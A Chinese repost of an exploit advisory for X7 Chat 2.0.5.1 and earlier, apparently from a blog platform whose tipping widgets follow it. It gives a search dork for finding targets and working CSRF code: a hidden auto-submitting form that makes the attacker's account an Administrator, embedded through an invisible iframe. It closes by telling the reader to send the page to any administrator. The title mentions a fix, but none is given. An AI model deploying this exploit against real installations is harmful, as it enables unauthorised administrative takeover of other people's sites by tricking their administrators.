X7 Chat 2.0.5.1及以下版本CSRF添加管理员缺陷及修复

标题: X7 Chat 2.0.5.1 CSRF Add Admin Exploit 
 
关键词: intitle:"Chat Room" "Powered By X7 Chat 2.0.5" 
 
作者: DennSpec   下载 地址: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip 
 
影响版本: <= 2.0.5.1 
 
首先注册获得一个用户名
  
 
(frame.html in path of your main html page) 
 
  
 
<html> 
 
    <body οnlοad="document.xform.submit();"> 
 
        <form name="xform" action="http:// www.2cto.com /x7path/index. php ?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post"> 
 
            <input type="hidden" name="username" value="YOURUSERNAME" /> 
 
            <input type="hidden" name="usergroup" value="Administrator" /> 
 
        </form> 
 
    </body> 
 
</html> 
 
  
 
替换http://www.xxx..com /x7path/为你的目标地址. 别忘了替换 YOURUSERNAME 到YOURUSERNAME. 
 
  
 
add this code to inside body tag of main html page:  
 
<iframe style="display:none;" src="frame.html"></iframe> 
 
  
 
and... upload main page and frame.html .

把这个页面传给任意管理员。。。
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值